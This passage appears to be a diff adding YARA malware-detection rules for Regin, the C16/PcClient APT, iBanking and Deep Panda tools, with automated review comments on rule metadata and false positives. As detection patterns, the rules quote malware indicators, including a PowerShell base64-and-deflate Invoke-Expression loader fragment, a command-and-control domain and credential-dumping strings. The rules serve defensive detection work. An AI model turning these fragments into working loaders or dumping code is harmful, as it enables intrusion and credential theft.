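Review bot: Every rule in this file puts the report URL in `description` (e.g. L1730) and has no `reference` field, so the meta never states what each rule detects; `reference = "http://cylance.com/opcleaver"` plus a one-line `description` per rule (for example `description = "Operation Cleaver - TinyZBot"`) would match the convention of the other rulesets in this commit. Several rules rest on one or two short, generic strings with no file-type or size gating — `zhLookUp` (L1968) is a single string, `pvz_out` (L1928–L1929) needs only `Network Connectivity Module` and `OSPPSVC`, both plausible in benign software — so expect hits on documents and reports that quote these names; an MZ check such as the `($mz at 0)` idiom used by the Hellsing and Regin rules would at least confine them to executables. Indentation also mixes tabs and spaces (L1732, L1735, L1860–L1865, L1993–L1995).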
diff --git a/malware/APT_Regin.yar b/malware/APT_Regin.yar
new file mode 100644
index 0000000..1e9d14a
--- /dev/null
+++ b/malware/APT_Regin.yar
@@ -0,0 +1,407 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule Regin_APT_KernelDriver_Generic_A {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash2 = "06665b96e293b23acc80451abb413e50"
+		hash3 = "d240f06e98c8d3e647cbf4d442d79475"
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+		$m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		
+		$s0 = "atapi.sys" fullword wide
+		$s1 = "disk.sys" fullword wide
+		$s3 = "h.data" fullword ascii
+		$s4 = "\\system32" fullword ascii
+		$s5 = "\\SystemRoot" fullword ascii
+		$s6 = "system" fullword ascii
+		$s7 = "temp" fullword ascii
+		$s8 = "windows" fullword ascii
+
+		$x1 = "LRich6" fullword ascii
+		$x2 = "KeServiceDescriptorTable" fullword ascii		
+	condition:
+		$m0 at 0 and $m1 and  	
+		all of ($s*) and 1 of ($x*)
+}
+
+rule Regin_APT_KernelDriver_Generic_B {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
+		hash2 = "bfbe8c3ee78750c3a520480700e440f8"
+		hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
+		hash4 = "06665b96e293b23acc80451abb413e50"
+		hash5 = "2c8b9d2885543d7ade3cae98225e263b"
+		hash6 = "4b6b86c7fec1c574706cecedf44abded"
+		hash7 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash8 = "d240f06e98c8d3e647cbf4d442d79475"
+		hash9 = "6662c390b2bbbd291ec7987388fc75d7"
+		hash10 = "1c024e599ac055312a4ab75b3950040a"
+		hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
+		hash12 = "b505d65721bb2453d5039a389113b566"
+		hash13 = "b269894f434657db2b15949641a67532"
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+		$s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		$s2 = "H.data" fullword ascii nocase
+		$s3 = "INIT" fullword ascii
+		$s4 = "ntoskrnl.exe" fullword ascii
+		
+		$v1 = "\\system32" fullword ascii
+		$v2 = "\\SystemRoot" fullword ascii
+		$v3 = "KeServiceDescriptorTable" fullword ascii	
+		
+		$w1 = "\\system32" fullword ascii
+		$w2 = "\\SystemRoot" fullword ascii		
+		$w3 = "LRich6" fullword ascii
+		
+		$x1 = "_snprintf" fullword ascii
+		$x2 = "_except_handler3" fullword ascii
+		
+		$y1 = "mbstowcs" fullword ascii
+		$y2 = "wcstombs" fullword ascii
+		$y3 = "KeGetCurrentIrql" fullword ascii
+		
+		$z1 = "wcscpy" fullword ascii
+		$z2 = "ZwCreateFile" fullword ascii
+		$z3 = "ZwQueryInformationFile" fullword ascii
+		$z4 = "wcslen" fullword ascii
+		$z5 = "atoi" fullword ascii
+	condition:
+		$m0 at 0 and all of ($s*) and 
+		( all of ($v*) or all of ($w*) or all of ($x*) or all of ($y*) or all of ($z*) ) 
+		and filesize < 20KB
+}
+
+rule Regin_APT_KernelDriver_Generic_C {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "e0895336617e0b45b312383814ec6783556d7635"
+		hash2 = "732298fa025ed48179a3a2555b45be96f7079712"		
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+	
+		$s0 = "KeGetCurrentIrql" fullword ascii
+		$s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
+		$s2 = "usbclass" fullword wide
+		
+		$x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
+		$x2 = "Universal Serial Bus Class Driver" fullword wide
+		$x3 = "5.2.3790.0" fullword wide
+		
+		$y1 = "LSA Shell" fullword wide
+		$y2 = "0Richw" fullword ascii		
+	condition:
+		$m0 at 0 and all of ($s*) and 
+		( all of ($x*) or all of ($y*) ) 
+		and filesize < 20KB
+}
+
+/* Update 27.11.14 */
+
+rule Regin_sig_svcsstat {
+	meta:
+		description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
+	strings:
+		$s0 = "Service Control Manager" fullword ascii
+		$s1 = "_vsnwprintf" fullword ascii
+		$s2 = "Root Agency" fullword ascii
+		$s3 = "Root Agency0" fullword ascii
+		$s4 = "StartServiceCtrlDispatcherA" fullword ascii
+		$s5 = "\\\\?\\UNC" fullword wide
+		$s6 = "%ls%ls" fullword wide
+	condition:
+		all of them and filesize < 15KB and filesize > 10KB 
+}
+
+rule Regin_Sample_1 {
+	meta:
+		description = "Auto-generated rule - file-3665415_sys"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
+	strings:
+		$s0 = "Getting PortName/Identifier failed - %x" fullword ascii
+		$s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
+		$s2 = "External Naming Failed - Status %x" fullword ascii
+		$s3 = "------- Same multiport - different interrupts" fullword ascii
+		$s4 = "%x occurred prior to the wait - starting the" fullword ascii
+		$s5 = "'user registry info - userPortIndex: %d" fullword ascii
+		$s6 = "Could not report legacy device - %x" fullword ascii
+		$s7 = "entering SerialGetPortInfo" fullword ascii
+		$s8 = "'user registry info - userPort: %x" fullword ascii
+		$s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
+		$s10 = "Kernel debugger is using port at address %X" fullword ascii
+		$s12 = "Release - freeing multi context" fullword ascii
+		$s13 = "Serial driver will not load port" fullword ascii
+		$s14 = "'user registry info - userAddressSpace: %d" fullword ascii
+		$s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
+		$s20 = "'user registry info - userIndexed: %d" fullword ascii
+	condition:
+		all of them and filesize < 110KB and filesize > 80KB
+}
+
+rule Regin_Sample_2 {
+	meta:
+		description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
+	strings:
+		$s0 = "\\SYSTEMROOT\\system32\\lsass.exe" fullword wide
+		$s1 = "atapi.sys" fullword wide
+		$s2 = "disk.sys" fullword wide
+		$s3 = "IoGetRelatedDeviceObject" fullword ascii
+		$s4 = "HAL.dll" fullword ascii
+		$s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" fullword ascii
+		$s6 = "PsGetCurrentProcessId" fullword ascii
+		$s7 = "KeGetCurrentIrql" fullword ascii
+		$s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s9 = "KeSetImportanceDpc" fullword ascii
+		$s10 = "KeQueryPerformanceCounter" fullword ascii
+		$s14 = "KeInitializeEvent" fullword ascii
+		$s15 = "KeDelayExecutionThread" fullword ascii
+		$s16 = "KeInitializeTimerEx" fullword ascii
+		$s18 = "PsLookupProcessByProcessId" fullword ascii
+		$s19 = "ExReleaseFastMutexUnsafe" fullword ascii
+		$s20 = "ExAcquireFastMutexUnsafe" fullword ascii
+	condition:
+		all of them and filesize < 40KB and filesize > 30KB
+}
+
+rule Regin_Sample_3 {
+	meta:
+		description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+		author = "@Malwrsignatures"
+		date = "27.11.14"
+		hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"		
+	strings:
+		$hd = { fe ba dc fe }
+	
+		$s0 = "Service Pack x" fullword wide
+		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
+		$s3 = "mntoskrnl.exe" fullword wide
+		$s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" fullword wide
+		$s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
+		$s6 = "Service Pack" fullword wide
+		$s7 = ".sys" fullword wide
+		$s8 = ".dll" fullword wide		
+		
+		$s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" fullword wide
+		$s11 = "IoGetRelatedDeviceObject" fullword ascii
+		$s12 = "VMEM.sys" fullword ascii
+		$s13 = "RtlGetVersion" fullword wide
+		$s14 = "ntkrnlpa.exe" fullword ascii
+	condition:
+		( $hd at 0 ) and all of ($s*) and filesize > 160KB and filesize < 200KB
+}
+
+rule Regin_Sample_Set_1 {
+	meta:
+		description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
+		hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"		
+	strings:
+		$s0 = "HAL.dll" fullword ascii
+		$s1 = "IoGetDeviceObjectPointer" fullword ascii
+		$s2 = "MaximumPortsServiced" fullword wide
+		$s3 = "KeGetCurrentIrql" fullword ascii
+		$s4 = "ntkrnlpa.exe" fullword ascii
+		$s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s6 = "ConnectMultiplePorts" fullword wide
+		$s7 = "\\SYSTEMROOT" fullword wide
+		$s8 = "IoWriteErrorLogEntry" fullword ascii
+		$s9 = "KeQueryPerformanceCounter" fullword ascii
+		$s10 = "KeServiceDescriptorTable" fullword ascii
+		$s11 = "KeRemoveEntryDeviceQueue" fullword ascii
+		$s12 = "SeSinglePrivilegeCheck" fullword ascii
+		$s13 = "KeInitializeEvent" fullword ascii
+		$s14 = "IoBuildDeviceIoControlRequest" fullword ascii
+		$s15 = "KeRemoveDeviceQueue" fullword ascii
+		$s16 = "IofCompleteRequest" fullword ascii
+		$s17 = "KeInitializeSpinLock" fullword ascii
+		$s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
+		$s19 = "IoCreateDevice" fullword ascii
+		$s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
+	condition:
+		all of them and filesize < 40KB and filesize > 30KB
+}
+
+rule Regin_Sample_Set_2 {
+	meta:
+		description = "Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+		author = "@MalwrSignatures"
+		date = "27.11.14"
+		hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
+		hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+	strings:
+		$hd = { fe ba dc fe }
+	
+		$s0 = "d%ls%ls" fullword wide
+		$s1 = "\\\\?\\UNC" fullword wide
+		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
+		$s3 = "\\\\?\\UNC\\" fullword wide
+		$s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
+		$s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
+		$s6 = "\\\\.\\Global\\%s" fullword wide
+		$s7 = "temp" fullword wide
+		$s8 = "\\\\.\\%s" fullword wide
+		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide		
+		
+		$s10 = "sscanf" fullword ascii
+		$s11 = "disp.dll" fullword ascii
+		$s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+		$s13 = "%d.%d.%d.%d%c" fullword ascii
+		$s14 = "imagehlp.dll" fullword ascii
+		$s15 = "%hd %d" fullword ascii
+	condition:
+		( $hd at 0 ) and all of ($s*) and filesize < 450KB and filesize > 360KB
+}
+
+rule apt_regin_legspin {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect Regin's Legspin module"
+	    version = "1.0"
+	    last_modified = "2015-01-22"
+	    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+	    md5 = "29105f46e4d33f66fee346cfd099d1cc"
+	strings:
+	    $mz="MZ"
+	    $a1="sharepw"
+	    $a2="reglist"
+	    $a3="logdump"
+	    $a4="Name:" wide
+	    $a5="Phys Avail:"
+	    $a6="cmd.exe" wide
+	    $a7="ping.exe" wide
+	    $a8="millisecs"
+	condition:
+	    ($mz at 0) and all of ($a*)
+}
+
+rule apt_regin_hopscotch {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect Regin's Hopscotch module"
+	    version = "1.0"
+	    last_modified = "2015-01-22"
+	    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+	    md5 = "6c34031d7a5fc2b091b623981a8ae61c"
+	strings:
+
+	    $mz="MZ"
+
+	    $a1="AuthenticateNetUseIpc"
+	    $a2="Failed to authenticate to"
+	    $a3="Failed to disconnect from"
+	    $a4="%S\\ipc$" wide
+	    $a5="Not deleting..."
+	    $a6="CopyServiceToRemoteMachine"
+	    $a7="DH Exchange failed"
+	    $a8="ConnectToNamedPipes"
+	condition:
+	    ($mz at 0) and all of ($a*)
+}
+
+
+rule apt_regin_2011_32bit_stage1 {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin 32 bit stage 1 loaders"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+$key1={331015EA261D38A7}
+$key2={9145A98BA37617DE}
+$key3={EF745F23AA67243D}
+$mz="MZ"
+condition:
+($mz at 0) and any of ($key*) and filesize < 300000
+}
+rule apt_regin_rc5key {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin RC5 decryption keys"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+$key1={73 23 1F 43 93 E1 9F 2F 99 0C 17 81 5C FF B4 01}
+$key2={10 19 53 2A 11 ED A3 74 3F C3 72 3F 9D 94 3D 78}
+condition:
+any of ($key*)
+}
+
+rule apt_regin_vfs {
+meta:
+	copyright = "Kaspersky Lab"
+	author = "Kaspersky Lab"
+	description = "Rule to detect Regin VFSes"
+	version = "1.0"
+	last_modified = "2014-11-18"
+strings:
+	$a1={00 02 00 08 00 08 03 F6 D7 F3 52}
+	$a2={00 10 F0 FF F0 FF 11 C7 7F E8 52}
+	$a3={00 04 00 10 00 10 03 C2 D3 1C 93}
+	$a4={00 04 00 10 C8 00 04 C8 93 06 D8}
+condition:
+	($a1 at 0) or ($a2 at 0) or ($a3 at 0) or ($a4 at 0)
+}
+
+rule apt_regin_dispatcher_disp_dll {
+
+meta:
+	copyright = "Kaspersky Lab"
+	author = "Kaspersky Lab"
+	description = "Rule to detect Regin disp.dll dispatcher"
+	version = "1.0"
+	last_modified = "2014-11-18"
+
+strings:
+	$mz="MZ"
+	$string1="shit"
+	$string2="disp.dll"
+	$string3="255.255.255.255"
+	$string4="StackWalk64"
+	$string5="imagehlp.dll"
+condition:
+	($mz at 0) and (all of ($string*))
+}
+
+rule apt_regin_2013_64bit_stage1 {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin 64 bit stage 1 loaders"
+ version = "1.0"
+ last_modified = "2014-11-18"
+ filename="wshnetc.dll"
+ md5="bddf5afbea2d0eed77f2ad4e9a4f044d"
+ filename="wsharp.dll"
+ md5="c053a0a3f1edcbbfc9b51bc640e808ce"
+strings:
+$mz="MZ"
+$a1="PRIVHEAD"
+$a2="\\\\.\\PhysicalDrive%d"
+$a3="ZwDeviceIoControlFile"
+condition:
+($mz at 0) and (all of ($a*)) and filesize < 100000
+}
+
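Review bot: apt_regin_2013_64bit_stage1 (L2397–L2400) declares `filename` and `md5` twice in one meta block; as far as I know yara compiles this, but tools that expose meta as a key/value map (yara-python's `rule.meta`, most rule managers) keep only the last pair and silently drop `wshnetc.dll` and its digest — `filename1`/`md5_1` and `filename2`/`md5_2` keeps both. The `hash`/`hashN` fields switch between MD5 (L2014–L2016), SHA-1 (L2093–L2094) and SHA-256 (L2194) without saying so, and dates alternate between `23.11.14` and `2014-11-18`; labelling the digest type (`sha1 = …`, `sha256 = …`) and using ISO dates throughout would make the meta machine-consumable. The Kaspersky rules at L2328–L2353 are unindented and inconsistent with the tabbed rules above them.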
diff --git a/malware/APT_c16.yar b/malware/APT_c16.yar
new file mode 100644
index 0000000..65cc46e
--- /dev/null
+++ b/malware/APT_c16.yar
@@ -0,0 +1,80 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule apt_c16_win_memory_pcclient 
+{
+  meta:
+    author = "@dragonthreatlab "
+    md5 = "ec532bbe9d0882d403473102e9724557"
+    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+  strings:
+    $str1 = "Kill You" ascii
+    $str2 = "%4d-%02d-%02d %02d:%02d:%02d" ascii
+    $str3 = "%4.2f  KB" ascii
+    $encodefunc = {8A 08 32 CA 02 CA 88 08 40 4E 75 F4}  
+  condition:
+    all of them
+}
+
+rule apt_c16_win_disk_pcclient 
+{
+  meta:
+    author = "@dragonthreatlab "
+    md5 = "55f84d88d84c221437cd23cdbc541d2e"
+    description = "Encoded version of pcclient found on disk"
+  strings:
+    $header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
+  condition:
+    $header at 0
+}
+
+rule apt_c16_win32_dropper 
+{
+  meta:
+    author = "@dragonthreatlab"
+    md5 = "ad17eff26994df824be36db246c8fb6a"
+    description = "APT malware used to drop PcClient RAT"
+  strings:
+    $mz = {4D 5A}
+    $str1 = "clbcaiq.dll" ascii
+    $str2 = "profapi_104" ascii
+    $str3 = "/ShowWU" ascii
+    $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
+    $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E}
+  condition:
+    $mz at 0 and all of ($str*)
+}
+
+rule apt_c16_win_swisyn 
+{
+  meta:
+    author = "@dragonthreatlab"
+    md5 = "a6a18c846e5179259eba9de238f67e41"
+    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+  strings:
+    $mz = {4D 5A}
+    $str1 = "/ShowWU" ascii
+    $str2 = "IsWow64Process"
+    $str3 = "regsvr32 "
+    $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
+  condition:
+    $mz at 0 and all of ($str*)
+}
+
+rule apt_c16_win_wateringhole 
+{
+  meta:
+    author = "@dragonthreatlab "
+    description = "Detects code from APT wateringhole"
+  strings:
+    $str1 = "function runmumaa()"
+    $str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
+    $str3 = "function MoSaklgEs7(k)"
+  condition:
+    any of ($str*)
+}
+
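Review bot: The `description` of `apt_c16_win_swisyn` says the MZ header check is omitted because the sample only lives in memory, yet the rule declares `$mz = {4D 5A}` and its condition requires `$mz at 0`; the text appears copied from `apt_c16_win_memory_pcclient` and now contradicts the logic. Either drop the `$mz at 0` term if in-memory matching is intended, or reword the meta to say the rule expects an on-disk PE with an MZ header. Separately, three `author` values carry a trailing space (`"@dragonthreatlab "`), which makes meta-based filtering by author inconsistent across the rules in this file; `author = "@dragonthreatlab"` throughout would fix it.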
diff --git a/malware/APT_pcclient.yar b/malware/APT_pcclient.yar
new file mode 100644
index 0000000..420512d
--- /dev/null
+++ b/malware/APT_pcclient.yar
@@ -0,0 +1,27 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule backdoor_apt_pcclient
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "APT.PCCLient"
+	filetype = "DLL"
+	version = "0.1"
+	description = "Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)"
+	date = "2012-10"
+strings:
+	$magic = { 4d 5a } // MZ
+	$string1 = "www.micro1.zyns.com"
+	$string2 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
+	$string3 = "msacm32.drv" wide
+	$string4 = "C:\\Windows\\Explorer.exe" wide
+	$string5 = "Elevation:Administrator!" wide
+	$string6 = "C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdb"
+condition:
+	$magic at 0 and 4 of ($string*)
+}
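Review bot: The two sample hashes in `backdoor_apt_pcclient` are buried in the free-text `description` rather than exposed as dedicated meta fields, so tooling that indexes `hash`/`md5` meta (as other files in this series do with `hash`, `hash1`, `md5`) will not pick them up. Adding `hash1 = "869fa4dfdbabfabe87d334f85ddda234"` and `hash2 = "4a85af37de44daf5917f545c6fd03902"` alongside the description keeps the prose and makes the references machine-readable. The `maltype` value `"APT.PCCLient"` also looks like a typo for `"APT.PCClient"`.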
diff --git a/malware/Android_Malware.yar b/malware/Android_Malware.yar
new file mode 100644
index 0000000..cf0e25a
--- /dev/null
+++ b/malware/Android_Malware.yar
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Android_Malware : iBanking
+{
+	meta:
+		author = "Xylitol xylitol@malwareint.com"
+		date = "2014-02-14"
+		description = "Match first two bytes, files and string present in iBanking"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3166"
+		
+	strings:
+		// Generic android
+		$pk = {50 4B}
+		$file1 = "AndroidManifest.xml"
+		// iBanking related
+		$file2 = "res/drawable-xxhdpi/ok_btn.jpg"
+		$string1 = "bot_id"
+		$string2 = "type_password2"
+	condition:
+		($pk at 0 and 2 of ($file*) and ($string1 or $string2))
+}
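Review bot: `import "pe"` is unused in this file and is out of place in a rule that matches APK/ZIP containers (`$pk at 0`); no rule here references `pe.` fields. The same unused `import "pe"` is present in every file of this series (APT_c16, APT_pcclient, Anthem_DeepPanda, Babar, Bangat, BlackEnergy, BlackShades, Bolonyokte, Boouset, Bublik_downloader, Casper, Cerberus, Cookies, DarkComet, Derusbi, Dexter, Dridex, Enfal), so it looks like a template artifact; dropping it where no rule uses the module removes a needless dependency on a module-enabled YARA build. The rule name `Android_Malware` is also far more generic than its iBanking-specific strings; a name such as `Android_iBanking` with the existing `iBanking` tag would describe what it actually detects.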
diff --git a/malware/Anthem_DeepPanda.yar b/malware/Anthem_DeepPanda.yar
new file mode 100644
index 0000000..455bc7a
--- /dev/null
+++ b/malware/Anthem_DeepPanda.yar
@@ -0,0 +1,100 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+/* Anthem Deep Panda APT */
+
+rule Anthem_DeepPanda_sl_txt_packed {
+	meta:
+		description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
+	strings:
+		$s0 = "Command line port scanner" fullword wide
+		$s1 = "sl.exe" fullword wide
+		$s2 = "CPports.txt" fullword ascii
+		$s3 = ",GET / HTTP/.}" fullword ascii
+		$s4 = "Foundstone Inc." fullword wide
+		$s9 = " 2002 Foundstone Inc." fullword wide
+		$s15 = ", Inc. 2002" fullword ascii
+		$s20 = "ICMP Time" fullword ascii
+	condition:
+		all of them
+}
+
+rule Anthem_DeepPanda_lot1 {
+	meta:
+		description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
+	strings:
+		$s0 = "Unable to open target process: %d, pid %d" fullword ascii
+		$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+		$s2 = "Target: Failed to load SAM functions." fullword ascii
+		$s5 = "Error writing the test file %s, skipping this share" fullword ascii
+		$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
+		$s8 = "Service start failed: %d (%s/%s)" fullword ascii
+		$s12 = "PwDump.exe" fullword ascii
+		$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
+		$s14 = ":\\\\.\\pipe\\%s" fullword ascii
+		$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
+		$s16 = "dump logon session" fullword ascii
+		$s17 = "Timed out waiting to get our pipe back" fullword ascii
+		$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
+		$s20 = "%s\\%s.exe" fullword ascii
+	condition:
+		10 of them
+}
+
+rule Anthem_DeepPanda_htran_exe {
+	meta:
+		description = "Anthem Hack Deep Panda - htran-exe"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
+	strings:
+		$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
+		$s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s5 = "[-] ERROR: Must supply logfile name." fullword ascii
+		$s6 = "[-] There is a error...Create a new connection." fullword ascii
+		$s7 = "[+] Accept a Client on port %d from %s" fullword ascii
+		$s8 = "======================== htran V%s =======================" fullword ascii
+		$s9 = "[-] Socket Listen error." fullword ascii
+		$s10 = "[-] ERROR: open logfile" fullword ascii
+		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s12 = "[+] Make a Connection to %s:%d ......" fullword ascii
+		$s14 = "Recv %5d bytes from %s:%d" fullword ascii
+		$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s16 = "[+] Waiting another Client on port:%d...." fullword ascii
+		$s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii
+		$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+	condition:
+		10 of them
+}
+
